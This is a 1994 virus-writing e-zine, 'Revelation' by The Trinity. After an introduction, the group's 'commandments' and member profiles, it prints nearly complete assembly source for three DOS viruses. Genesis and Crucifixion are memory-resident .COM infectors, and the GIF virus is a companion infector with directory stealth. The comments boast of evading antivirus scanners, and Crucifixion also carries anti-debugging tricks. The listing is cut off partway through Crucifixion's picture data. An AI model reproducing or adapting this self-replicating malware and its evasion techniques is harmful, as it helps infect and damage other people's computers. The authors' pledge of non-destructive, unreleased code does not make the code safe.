Revelation Volume 1 Issue 1 April 1, 1994 Written by : The Trinity Published by : Public Demand Notice : this is a magazine for the people, by some of the people, namely, us. If you are an individual, you can read this magazine free of charge. How- ever, for Corporations or other organizations in general, there is an exhorbittant fee. If you choose to read this as part of an organization, you must pay the exhorbittant fee, or we will be very angry with you. However, you may feel free to read it as a free-thinking individual and go without charges. This magazine is the premiere publication of The Trinity, a non-profit organization with the intent of spreading Truth. The Truth we spread is not the same one you hear about every day (most people don't anyway). We intend to show people that viruses (more commonly called self-replicating code) do not have to be harmful, and that they can indeed be quite intriguing. Also, as underthemes, because we are free thinkers, we will include some freedom of information and current events or whatever we feel like. - Noah File Contents : Revel_1.001...................If you don't know, we won't tell you. Revel_1.002...................The Ten Commandments of The Trinity Revel_1.003...................Introduction to The Trinity by Noah Revel_1.004...................Genesis Virus, by Holy Spirit Revel_1.005...................GIF Virus, by God Revel_1.006...................Crucifixion Virus, by Jesus Revel_1.007...................Stupid Batch Loader Virus, by Jesus + Moses Trinity.ANS...................Trinity Ansi, by Moses HaHa.GIF......................Picture for GIF virus Trinity.COM...................VGA Loader for Trinity, by Holy Spirit A Great Big "Hey! We're Finally Here! Whassup?" Goes Out To: Phalcon/Skism, TridenT, Mark Ludwig, Urnst Kouch, CRIS, WCIVR, AKA, ARCV, and all virus writers and researchers everywhere. The Ten Commandments of The Trinity 1.) THOU SHALT WRITE THINE OWN CODE. There is no art in copying. Learn from others, but be original. 2.) THOU SHALT NOT WRITE DESTRUCTIVE CODE. Create Art, Not Weaponry. 3.) THOU SHALT NOT PROGRAM OVERWRITING VIRUSES. Virons suck. Write real code. 4.) THOU SHALT WRITE TIGHT CODE. Sloppy programming makes me PuKE. Programming is an art, treat it as such. 5.) THOU SHALT BE CREATIVE AT ALL TIMES. Writing useless code that looks like it was mass generated is boring and stupid. Either write something interesting, or don't write. 6.) THOU SHALT NOT RELEASE VIRUSES ON THE PUBLIC. What's the point? Code for the challenge and the skill, not to screw with ignorant users. 7.) THOU SHALT NOT DEAL WITH ARiSToTLe. Some things are just better left undone. 8.) THOU SHALT FIGHT FOR THINE RIGHTS. Freedom is important. Information is important. Fight to keep information, and yourself, free. 9.) THOU SHALT ENCOURAGE THE LEARNING OF THINE ART. Be free with information, and teach those that desire to learn. 10.) THOU SHALT CONTINUE EXPLORING AND LEARNING UNTIL THE END OF THINE TIME. If you aren't learning something, and you aren't doing something new, don't bother. "In the beginning, God created the heavens and the earth." Genesis 1:1 An Introduction to The Trinity by Noah Well, I guess it's always good to start at the beginning. In the beginning.... hmmmm. Where was the beginning of this whole mess? A telephone call. A Sunday night. An angry parent. My friend got a call from his roommate's mother yelling about what a bad influence he was on her son and how conceited he was and how my friend thought himself a math god. Well, this last quote slowly transformed into just "god". So since this guy's mother had to be right (not) my friend became God, as a fun in-joke. Well, it came around that there were three people who wanted to start a virus writing group, and since one person was already "God" (in joke only, not as a handle) they decided on The Trinity as a label. Thus were born God, Jesus, and the Holy Spirit. Not too long after, two people who were knowledgeable on how the computer underground worked, besides being friends of the original three, joined on. These two, keeping with the theme, became Moses and Noah. About a week ago, we had our first group meeting. The three coders each had something in the works already, so we decided that a joint release along with an introduction to the members could be released in one magazine and give us a starting point, along with a common goal. Well, we decided on a deadline and, of course, we're all working on it the night before said deadline. This tells you a little about the group, I might be able to pull off profiles of the members, but it _is_ 1:40 in the morning, so I'm only doing my best. Let's see : God : I've known this guy for about 5 years, and I've seen him go all the way from pascal to cutting-edge assembly code. His first virus for the group was designed for my roommate, a guy with close to 200 megs of gifs on his hard drive. God is one of the coders for the group, and is well versed in assembly, C, and pascal. although he rarely goes for high-level stuff anymore. He is a Math major, enjoys Led Zeppelin, Pink Floyd (yes, he has a ticket to the concert), and has decided that having a generous girlfriend with a car is much better than having a car yourself. Jesus : I don't know much about him, except he's a really good assembly programmer. He plays the Bass Guitar, has exceptionally long hair (thus the handle he chose), and is the only person I've seen recently pay for a pizza, eat a quarter, give half away, then throw away a quarter. Holy Spirit : Due to this lengthy handle, he has chosen the truncated H_Spirit. H_Spirit is a very likable guy, even though he claims to hold 95% of the world in contempt. He just learned assembly 3 months ago, and already has a nice virus. Not bad. He is now proficient in C and assembly, and also has tickets to see Pink Floyd (don't you hate these people!). Moses : The first of two non-programmers in the group. He does a lot of the graphics and music for the group. He was one of the people on the original InterChat, and plans to eventually learn assembly. Noah : I am the second of the non-programmers. I do whatever is left over that doesn't require any assembly knowledge, like writing introduction profiles. Eventually, I plan to learn assembly as well. ; Genesis v1.00 ; ÄÄÄÄÄÄÄÄÄÄÄÄÄ ; ; "As long as the earth endures, ; seedtime and harvest, ; cold and heat, ; summer and winter, ; day and night ; will never cease." ; -Genesis 8:22 ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; ; Memory Resident .COM Infector ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Critical Error Handler ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Screen Routine After 4 Infections ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Interesting Techniques ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Unable To Be Scanned By Known Scanners ; (F-Prot, TBscan, Scan) ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Written by Holy Spirit ; Årinity ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; ; Also: to run effectively, a stub of 4 bytes should be appended to the ; beginning of the virus. .model tiny .radix 16 .code org 100 start: call get_offset db 'F' get_offset: mov bp,sp mov bp,[bp] dec sp dec sp sub bp, offset get_offset-1 ; set offset of start Check_res: mov ax, 3565 ; Is Int 65 hooked? int 21 mov bx, es cmp bx, 0 jne in_memory Allocate_Memory: sub word ptr ds:[02], 40 ; lower top of mem by 1K mov ax,ds dec ax ;Get Segment of MCB mov ds,ax sub word ptr ds:[03],40 ;Subtract 1K from host's MCB xor ax,ax mov ds,ax ;Allocate 1K from Bios dec word ptr ds:[413] mov ax,word ptr ds:[413] ;Get memory in 1K mov cl,6 shl ax,cl ;change to segment ;AX now equals free segment ;of memory sub ax, 10 mov es,ax ;Set ES = Free Segment push cs ;And DS = Code Segment pop ds Copy_Virus: mov di,100 ;keep offset the same as COM lea si,[bp+start] mov cx,(_end-start+1)/2 MoveIntoMem: push [si] pop ax inc si inc si stosw loop MoveIntoMem set_interrupts: push es es ; set ds and dx to new segment pop dx ds xor ax, ax mov es, ax ; ES = 0 cli mov word ptr es:[65*4], offset Int_65 ; Set Int 65 mov word ptr es:[65*4+2], dx mov word ptr es:[1c*4], offset Int_1c ; Set Int 1C mov word ptr es:[1c*4+2], dx lea ax, Int_21 ; Set Int 21 xchg word ptr es:[21*4], ax xchg word ptr es:[21*4+2], dx mov ds:[IP_21], ax mov ds:[CS_21], dx push ax dx pop es:[69*4+2] pop es:[69*4] sti in_memory: mov di, 100 ; set DI to start of program lea si, [bp+storage_bytes+10] ; Set SI to offset of storage ; bytes plus one segment push cs cs pop es bx ; Set ES to Code Segment xor ax, ax ; Reset AX register dec bx mov ds, bx ; Set DS to one segment less ; than Code Segment mov ax, [si] ; Put back original four bytes mov word ptr [di+10], ax ; at beginning of program mov ax, [si+2] mov word ptr [di+2+10], ax inc bx mov ds, bx ; Reset DS back to CS xor bx, bx ; Reset all other registers xor cx, cx xor dx, dx jump_to db 0e9 progstart dw start-progstart-6 Int_21: inc ah cmp ax, 4c00 ; Is it a regular execute? je have_fun ; No? Exit. jmp go_int21 have_fun: push ax bx cx dx si di es ds cli xor ax, ax mov es, ax push es:[24*4] push es:[24*4+2] push cs ; capture critical error handler push offset int_24 ; for those unwanted "write pop es:[24*4] ; protected" disks... pop es:[24*4+2] sti mov ax, 3d02 ; open for read/write int 69 jc no_open ; did it open right? If not get out. xchg bx, ax ; BX = file handle mov ah, 3f ; Read first four bytes push cs pop ds lea dx, storage_bytes mov cx, 4 int 69 mov ax, word ptr storage_bytes ; If it's an EXE close add ah,al cmp ah,'M'+'Z' je close_it cmp byte ptr [storage_bytes+3], 0fe ; if already infected close je close_it inc cs:infected_four ; Keep track of number infected mov ax, 4202 ; Go to end of file xor cx, cx xor dx, dx int 69 not ax mov progstart, ax sub progstart, jump_to-start+2 not ax sub ax, 3 ; Calculate jump to virus mov word ptr jump_to_virus+1, ax ; Store jump in memory push cs:infected_four ; save current number of infections mov cs:infected_four, 0 ; set to zero for copying mov ah, 40 mov cx, _end-start mov dx, offset start int 69 ; append virus to program pop cs:infected_four ; reset back to original value mov ax, 4200 xor cx, cx xor dx, dx int 69 ; jump back to beginning of program mov ah, 40 mov cx, 4 mov dx, offset jump_to_virus int 69 ; write the jump to the virus close_it: mov ah, 3e ; close the file int 69 no_open: pop es:[24*4+2] pop es:[24*4] ; reset critical error handler pop ds es di si dx cx bx ax ; reset original registers go_int21: dec ah db 0ea ; call a real Int 21 IP_21 dw ? CS_21 dw ? int_24: mov al, 3 iret Int_65: ; fake interrupt to check for iret ; installation count2 db 1 ; variable to keep track of fading Int_1C: push ax cx dx ds si ; push registers cmp cs:infected_four, 4 ; only run if four files have been jb return2 ; infected since installation cmp cs:count2, 1 je C1 cmp cs:count2, 2 je C2 cmp cs:count2, 3 je C3 mov dl, 7 mov cs:count2, 1 jmp setup C1: mov dl, 8 mov cs:count2, 2 jmp setup C2: mov dl, 0 mov cs:count2, 3 jmp setup C3: mov dl, 8 mov cs:count2, 4 setup: mov ax, 0b800 mov ds, ax mov cx, 2000d mov si, 1 loop_: mov byte ptr [ds:si], dl add si, 2 loop loop_ return2: pop si ds dx cx ax iret infected_four dw 0 storage_bytes db 0cdh, 20, 90, 0fe jump_to_virus db 0e9, 00, 00, 0fe _end: end start ; "But I say to you that whoever looks at a woman to lust for her ; has already committed adultery with her in his heart." ; - The Gospel of Matthew 5:27 ; ; "And God said, 'Let there be a GIF virus'..." ; ; The Trinity Proudly Presents ; The GIF Virus ; (No, it doesn't infect GIF files...) ; Brought into Existence By ; God ; ; This one is for all of the giffy boys and girls out there... ; ; "If your right eye causes you to sin, pluck it out and cast it ; from you; for it is more profitable for you that one of your ; members perish, than for your whole body to be cast into hell." ; - Matthew 5:28 ; ; Features ; ÍÍÍÍÍÍÍÍÍÍ ; Memory Resident Companion .EXE and .COM infector ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Manages a Companion Companion File (The GIF) ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Infects on Execution and Drive Changes ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Some Directory Stealth Routines for ; the Companion Files and the GIF file ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; A cool GIF will definitely turn your stomach ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; ; *NOTE*: To initiate this virus, you must copy HAHA.GIF to the ; root directory. ; ; "And if your right hand causes you to sin, cut it off and cast ; it from you; for it is more profitable for you that one of your ; members perish, than for your whole body to be cast into hell." ; - Matthew 5:29 ; ; "... And God saw that it was good." .286 ; If you don't have a 286... .model tiny ; ... nevermind. .radix 16 .code org 100h main: Allocate_Mem: push ds mov ax,ds dec ax mov ds,ax mov byte ptr ds:[0],'Z' sub word ptr ds:[03],120 sub word ptr ds:[12],120 xor ax,ax mov ds,ax sub word ptr ds:[413],3 mov ax,word ptr ds:[413] mov cl,6 shl ax,cl sub ax,10 mov es,ax Copy_Virus: mov di,100h lea si,main pop ds mov cx,(_end-main+1)/2 repnz movsw Set_Interrupts: push es es pop dx ds xor ax,ax mov es,ax cli lea ax,Int_21 xchg word ptr es:[21*4],ax ; Redirect Int 21 xchg word ptr es:[21*4+2],dx mov [IP_21],ax ; Save old Int 21 mov [CS_21],dx mov word ptr es:[65*4],ax ; Redirect Int 65 to mov word ptr es:[65*4+2],dx ; old Int 21 sti Exec_Command: push cs pop ds push word ptr ds:[2c] ; Get segment for environment pop ds xor si,si Goto_Command: lodsw ; Skip junk at beginning of cmp ax,0 ; environment. je Got_Command ; There is a 0000h right before dec si ; the command line. jmp Goto_Command Got_Command: lodsw push cs pop es lea di,filename Get_Name: stosb ; Copy command line. lodsb cmp al,'.' jne Get_Name push cs pop ds mov si,81 Get_Param: ; Copy parameters lodsb stosb cmp al,0dh jne Get_Param mov cx,di lea si,filename sub cx,si mov byte ptr es:[si],cl mov ah,4a mov bx,(_end-main+10)/10 int 21 int 2e ; Execute. mov ax,4c00 int 21 open_file: inc cs:counter cmp cs:counter,7 ; Shows GIF on every 7th jl go_int21 ; open. mov cs:counter,0 push si xor si,si xchg bx,dx next_byte: cmp byte ptr [bx+si],'G' ; Is it a GIF? je found cmp byte ptr [bx+si],'g' je found cmp byte ptr [bx+si],0 je not_gif inc si jmp next_byte found: inc si cmp [bx+si],4649 je open_my_file cmp [bx+si],6669 jne next_byte open_my_file: ; If so, open my GIF :) xchg bx, dx push ds push cs pop ds push dx lea dx,the_file inc cs:in_prog int 21 dec cs:in_prog pop dx ds si iret not_gif: xchg bx,dx pop si jmp go_int21 go_int21: db 0ea IP_21 dw ? CS_21 dw ? dc: jmp driv_chng of: jmp open_file found_file: pop ds es popf popa retf 02 error_find: mov ax,12h retf 02 find_file: int 65 jc error_find pusha pushf push es ds mov ah,2f int 65 cmp word ptr es:[bx+1a],offset end_prog-100 je find_next not_virus: push cs pop ds mov si,offset the_file+1 add bx,1e mov di,bx mov cx,4 rep cmpsb or cx,cx jz find_next find_ext: inc bx cmp byte ptr es:[bx],'.' jne find_ext cmp word ptr es:[bx+2],'ZX' jne not_EXZ1 mov byte ptr es:[bx+3],'E' jmp found_file not_EXZ1: cmp word ptr es:[bx+2],'ZO' jne found_file mov byte ptr es:[bx+3],'M' jmp found_file find_next: pop ds es popf popa mov ah,4fh jmp find_file Int_21: cmp cs:[in_prog],00h ; Is stealth on? jne go_int21 cmp ah,0eh je dc cmp ah,3dh je of cmp ax,4b00 je execute cmp ah,11 je find_fcb cmp ah,12 je find_fcb cmp ah,4eh je find_file cmp ah,4f je find_file jmp go_int21 find_fcb: int 65 cmp al,0ff je no_matching_fcb check_file: pusha push es ds mov ah,2f int 65 cmp byte ptr es:[bx],0ff jne not_extended add bx,8 not_extended: cmp word ptr es:[bx+1c],offset end_prog-100 je find_next_fcb push cs pop ds mov si,offset the_file+1 mov di,bx mov cx,4 rep cmpsb or cl,cl jz find_next_fcb cmp word ptr es:[bx+9],'ZX' jne not_EXZ2 mov byte ptr es:[bx+0A],'E' jmp found_file_fcb not_EXZ2: cmp word ptr es:[bx+9],'ZO' jne found_file_fcb mov byte ptr es:[bx+0A],'M' jmp found_file_fcb find_next_fcb: pop ds es popa mov ah,12 jmp find_fcb found_file_fcb: pop ds es popa no_matching_fcb: iret execute: push si es di ax cx ds bx dx push cs pop es mov si,dx lea di,filename push di copy_str: lodsb stosb or al,al jnz copy_str mov byte ptr es:[di-2],'Z' ; Infection Routine mov ah,56 ; Rename pop di int 65 jc already_there mov ah,3c ; Copy Virus mov cl,0010b int 65 push cs pop ds xchg bx,ax mov ah,40 mov cx,offset end_prog-100 mov dx,100 int 65 mov ah,3e int 65 already_there: pop dx bx ds cx ax di es mov byte ptr ds:[si-2],'Z' pop si jmp go_int21 driv_chng: ; Copies the GIF companion on push ds ; drive changes. push es pusha inc cs:in_prog ; check to see if same drive mov ah,19 int 21 cmp al,dl je pop_a push cs ; open the file to copy pop ds mov ax,3d00 push dx lea dx,the_file int 21 pop dx jc pop_a mov di,ax mov ah,0e int 21 mov ah,4e mov cx,00100011b lea dx,the_file add dx,2 int 21 jnc close_2nd mov ah,3c mov cx,00100011b lea dx,the_file int 21 xchg di,ax lea dx,_end mov bx,ax read_write: mov ah,3f mov cx,800 int 21 xchg bx,di mov cx,ax mov ah,40 int 21 xchg bx,di cmp ax,800 jnb read_write xchg bx,di mov ah,3e int 21 close_2nd: mov bx,di mov ah,3e int 21 pop_a: popa pop es pop ds dec cs:in_prog jmp go_int21 the_file db '\HAHA.GIF',0 ; Name of our .GIF counter db 0 ; To keep track of number of files viewed in_prog db 0 end_prog: filename db 50 dup(?) _end: end main ;ÉÍÍÄÄÄÄ ÄÄÄÄÍÍ» ;º (rucifixion Virus 1.0 º ;³ "If You're The Messiah And Ya Know It" ³ ;³ Created by ³ ; Jesus of The Trinity ; Ü Ü ; ßÛß ßÛß ; Û Û ; "Let the Christ, the King of Israel, ; Descend now from the cross, ; That we may see and believe" ; - Mark 15:32 ; ; Features ; ÍÍÍÍÍÍÍÍÍÍ ; Memory resident appending .COM infector ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Not detected by F-Prot/TBAV with heuristics ; (sets off NO flags) ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Infects .COM files when they are copied ; or scanned by some programs (F-Prot) ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Anti-debugging/disassembling code included ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; File attributes, time, and date remain intact ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Int 24h critical error handling enabled ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; And of course, one hell of a cool activation routine! ;³ Activates on Sundays during March and April of any year ³ ;³ when the system is rebooted using CTRL-ALT-DEL. ³ ;º ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ º ;ÈÍÍÄÄÄÄ ÄÄÄÄÍͼ ;This virus needs a four byte stub file for its first generation. ;Simply make a file of 4 nops in debug and save it, then merge the two ;files with somethin' like "copy /b stub.com+cruc.com crucifix.com". .model tiny .radix 16 .code org 100 Crucifixion: call Displacement DitchDebuggers: ;And heuristics.... push di mov di,si add di,(Trap1-crucifixion-3) mov ah,0cdh xchg [di],ah ;Cause some heuristics and debuggers to Trap1: ;terminate right here..... mov bx,2090 ;<---- xchg [di],ah pop di jmp short RestoreComHost Trap2 db 9a RestoreComHost: add si,(Storagebytes-crucifixion-3) jmp short Trap3 db 0b8 Trap3: movsw movsw SetupAllocation: push ds pop ax dec ax dec ax mov ds,ax inc ax CheckIfInstalled: cmp byte ptr ds:[10],'Z' ;Will not go memory res. if it is not jne ExitCrucifixion ;in the last block of memory. ModCurrentMCB: sub word ptr ds:[13],(endcruc-Crucifixion)/10+3 add ax,word ptr ds:[13] mov byte ptr ds:[10],'M' inc ax mov es,ax inc ax CreateNewMCB: mov word ptr es:[8],'eJ' mov word ptr es:[1],ax mov word ptr es:[0a],'uS' mov byte ptr es:[0],'Z' mov word ptr es:[0c],'S' mov word ptr es:[3],(endcruc-Crucifixion)/10+1 CopyVirus: sub ax,10 mov es,ax mov di,100 sub si,(EndStorage-Crucifixion)-20 mov cx,EndCruc-Crucifixion repnz movsb HookInts: xor ax,ax mov ds,ax cli mov ax,offset Int21h xchg word ptr ds:[84],ax mov word ptr es:[Old21],ax mov ax,es ;Int 21h xchg word ptr ds:[86],ax mov word ptr es:[Old21+2],ax mov ax,offset Int09 xchg word ptr ds:[9*4],ax mov word ptr es:[Old09],ax ;Int 09h mov ax,es xchg word ptr ds:[9*4+2],ax mov word ptr es:[Old09+2],ax sti ExitCrucifixion: push cs cs pop es ds xor ax,ax mov bx,ax mov cx,ax mov dx,ax mov di,ax mov si,100 ret Displacement: mov di,sp mov si,[di] sub sp,2 mov [di-2],si mov word ptr [di],100 mov di,[di] ret StorageBytes db 0cdh,20,90,90 EndStorage: Jmpbytes db 0e9,0,0,'Å' ;The cross is out ID byte ;) db 0ea Int21h: cmp ah,6c ;This one is used by copy and similar progs. je DosOpenFile ExitInt21h: db 0ea Old21 dd 0 db 0b8 DosOpenFile: push ax bx cx es dx di ds si call Set24 ;Set Error Handler mov dx,si FindStringEnd: lodsb or al,al jnz FindStringEnd cmp word ptr [si-4],'OC' jne DontInfect cmp word ptr [si-2],'M' je InfectFile DontInfect: jmp ExitFile InfectFile: mov ax,43 call call21 ;Get old attributes mov cs:[attribs],cx xor cx,cx mov ax,143 ;set 'em to zero call call21 mov ax,023dh call call21 push cs pop ds jc ExitFile ;open file read/write xchg bx,ax mov ax,57 call call21 mov word ptr [TimeDate],cx ;save time/date mov word ptr [TimeDate+2],dx mov dx,offset StorageBytes mov al,3f ;read in beginning of prog mov cx,4 call call21 cmp byte ptr [Storagebytes+3],'Å' je CloseFile ;Check if already infected mov ax,word ptr [Storagebytes] xor ah,al ;Check if .EXE file cmp ah,17 je CloseFile mov ax,0242 call MoveFP ;go to the end of file cmp ax,0ff00h-(endCruc-Crucifixion) ;Make sure size is small enough jae CloseFile ;that we don't push it > 64k add ax,-3 mov word ptr [jmpbytes+1],ax ;calculate jump size mov cx,endCruc-Crucifixion mov dx,100 mov al,40 ;append virus call call21 mov ax,42 ;go to beginning of program call MoveFP mov al,40 mov dx,offset jmpbytes mov cx,4 ;write in jump and ID call call21 CloseFile: mov word ptr cx,[TimeDate] mov word ptr dx,[TimeDate+2] mov ax,157 ;restore time/date call call21 mov al,3e call call21 ;close it pop dx ds push ds dx mov ax,143 mov cx,word ptr cs:[Attribs] ;restore attribs call call21 ExitFile: call Reset24 ;Restore Error Handler pop si ds di dx es cx bx ax jmp ExitInt21h MoveFP: xor cx,cx xor dx,dx call call21 ret Call21: xchg ah,al pushf call dword ptr cs:[Old21] ret db 0b1 Set24: push ds ax xor ax,ax mov ds,ax mov ax,offset Int24 xchg ax,word ptr ds:[24*4] mov word ptr cs:[Old24],ax ;set up critical error handler mov ax,cs xchg ax,word ptr ds:[24*4+2] mov word ptr cs:[Old24+2],ax pop ax ds ret db 0e9 Reset24: push ds ax xor ax,ax mov ds,ax mov ax,word ptr cs:[Old24] mov word ptr ds:[24*4],ax ;restore old critical error handler mov ax,word ptr cs:[Old24+2] mov word ptr ds:[24*4+2],ax pop ax ds ret Int24: mov al,3 ;return a "Fail" on errors iret Old24 dd 0 db 0ea Int09: push ax in al,60 cmp al,53 ;Is DEL, lets check for Control-Alt je IsDEL NotAReboot: pop ax GoInt09: db 0ea Old09 dd 0 IsDEL: push ds sub ax,ax mov ds,ax mov al,byte ptr ds:[417] pop ds and al,1100b cmp al,0c jne NotAReboot IsDefinitelyReboot: mov al,2a call call21 ;Get Date or al,al jnz RebootComp ;Is it sunday? cmp dh,3 jb RebootComp ;Is it in march? cmp dh,4 ja RebootComp ;or april? call CrucifixionActivation RebootComp: db 0ea,0,0,0ff,0ff ;cold reboot Old_SS dw 0 Old_SP dw 0 CrucifixionActivation: mov ax,sp mov cs:[Old_sp],ax mov ax,ss mov cs:[Old_SS],ax cli mov ax,cs mov ss,ax mov sp,offset EndCruc sti SetScreen: mov ax,13 int 10 push cs cs pop es ds SetColors: mov ax,1012 xor bx,bx mov cx,08 mov dx,offset ColorData int 10 DoTitle: mov dx,09 call setcurs mov si,offset Vname call WriteIt mov dx,0103 call setcurs mov si,offset credits call writeit SetupPic: push cs pop ds mov si,offset StartCross mov di,0a000 mov es,di mov di,3640 call DrawIt GetKey: call DoMusic DoneGraphics: mov ax,3 int 10 call Speaker_On mov cx,100 FallingSound: mov ax,cx call Out_Sound call delay add cx,200 cmp cx,1a00 jb FallingSound call Turn_Off_Speaker RestoreStack: cli mov ax,word ptr cs:[Old_SS] mov ss,ax mov ax,word ptr cs:[Old_SP] mov sp,ax sti ret DrawIT: mov bp,di DrawLoop: lodsb cmp al,0ff je Line cmp al,0 je Eol stosb jmp DrawLoop Line: lodsb ;get color xchg cx,ax ;save in cl xor ah,ah ;zero ah lodsb ;get line length xchg cx,ax ;put color in al and length into cx repnz stosb jmp DrawLoop Eol: cmp byte ptr [si],0 je DoneDraw mov di,bp add di,320d jmp Drawit DoneDraw: ret WriteIt: lodsb or al,al jz DoneWrite mov bx,4 mov ah,0e int 10 jmp WriteIt DoneWrite: ret setcurs: mov ah,02 mov bh,0 ;Set cursor int 10 ret IfYourThe: push si mov si,offset Lyrics1 DoLyric: mov dx,1001 call setcurs call WriteIt pop si jmp PlayMusic ClapYour: push si mov si,offset Lyrics2 jmp DoLyric YourFace: push si mov si,offset Lyrics3 jmp DoLyric DoMusic: push cs pop ds mov si,offset MusicData PlayMusic: lodsw cmp ax,0 je DoneMusic cmp ax,1 je TurnItOn cmp ax,2 je TurnItOff cmp ax,-1 je WaitSome cmp ax,-2 je Scree cmp ax,3 je IfYourThe cmp ax,4 je CLapYour cmp ax,5 je YourFace cmp ax,6 je TheClap call Out_Sound jmp PlayMusic DoneMusic: ret TurnItOn: call Speaker_On jmp PlayMusic TurnItOff: call Turn_Off_Speaker jmp PlayMusic WaitSome: mov cx,3 WaitMore: call delay loop WaitMore jmp PlayMusic TheClap: push es ds si di mov si,offset Arms3 je DoArms3 Scree: push es ds si di DoArms2: mov si,offset Arms2 DoArms3: mov di,0a000 mov es,di mov di,3640+320d*10d call DrawIt call Speaker_On mov cx,400 cmp si,offset Arms3 ja MakeScreech mov cx,8000 MakeScreech: mov ax,cx call Out_Sound call delay sub cx,3f cmp si,offset Arms3 ja LowCheck cmp cx,7f00 ja MakeScreech call Turn_Off_Speaker jmp short DoArms1 LowCheck: cmp cx,300 ja MakeScreech call Turn_Off_Speaker DoArms1: mov si,offset Arms1 mov di,0a000 mov es,di mov di,3640+320d*10d call DrawIt pop di si ds es jmp PlayMusic delay: push ax ds xor ax,ax mov ds,ax mov ax,word ptr ds:[46c] waiter: cmp ax,word ptr ds:[46c] je waiter pop ds ax ret Turn_Off_Speaker: in al,61h and al,0FCh out 61h,al ret Speaker_On: in al,61h or al,3 out 61h,al ;Turn on speaker mov al,0B6h out 43h,al ret Out_Sound: out 42h,al mov al,ah out 42h,al ret ColorData: db 0,0,0,32,1f,13,1bh,12,9,12,0e,6,19,0,0,2a,1a,10,0,13,0,0,0,18 ;Picture Data ; 0ff marks line, 0 marks eol ; ; Line Format: ; 0ffh, color, length ; ;double 0 marks eof StartCross: db 0ff,0,18d,0ff,3,0a,0 db 0ff,0,18d,0ff,3,0a,0 db 0ff,0,18d,3,3,3,0ff,2,5,3,3,0 db 0ff,0,18d,3,3,6,0ff,2,5,6,3,0 db 0ff,0,18d,3,3,2,6,2,6,2,6,2,3,0 db 0ff,0,18d,3,3,2,1,7,1,7,1,2,3,0 db 0ff,0,18d,3,3,2,0ff,1,5,2,3,0 db 0ff,0,18d,3,3,2,1,5,5,5,1,2,3,0 db 0ff,0,18d,3,3,2,2,1,1,1,2,2,3,0 db 0ff,3,20d,2,2,1,1,1,2,2,0ff,3,18d,0 db 3,3,3,5,0ff,3,13d,5,5,2,2,2,1,1,1,2,2,2,5,5,0ff,3,12d,5,3,3,0 db 3,3,5,5,5,0ff,3,7,0ff,5,6,1,2,2,2,1,1,1,2,2,2,1,0ff,5,6,0ff,3,6,5,5,5,3,0 db 3,5,4,3,4,0ff,5,7,0ff,1,7,2,2,2,1,1,1,2,2,2,0ff,1,7,0ff,5,6,4,3,4,5,0 db 3,3,5,4,5,0ff,1,15d,2,2,1,1,1,2,2,0ff,1,14d,5,4,5,3,0 db 3,3,3,0ff,5,17d,0ff,1,7,0ff,5,16d,3,3,0 db 0ff,3,20d,5,0ff,1,5,5,3,0ff,3,17d,0 db 0ff,0,18d,3,3,5,0ff,1,5,5,3,0 db 0ff,0,18d,3,3,5,0ff,1,5,5,3,0 db 0ff,0,18d,3,3,5,0ff,1,5,5,3,0 db 0ff,0,18d,3,3,5,0ff,1,5,5,3,0 db 0ff,0,18d,3,3,5,0ff,1,5,5,3,0 db 0ff,0,18d,3,3,5,0ff,1,5,5,3,0 db 0ff,0,18d,3,3,5,0ff,1,5,5,3,0 db 0ff,0,18d,3,2,5,0ff,1,5,5,2,0 db 0ff,0,18d,3,0ff,2,09,0 db 0ff,0,18d,0ff,2,0a,0 db 0ff,0,18d,0ff,2,0a,0 db 0ff,0,18d,0ff,2,5,1,2,2,2,1,2,0 db 0ff,0,18d,2,2,2,2,1,2,2,2,1,2,2,0 db 0ff,0,18d,2,5,2,1,1,5,2,1,1,2,2,0 db 0ff,0,18d,2,5,1,1,1,5,1,1,1,5,0 db 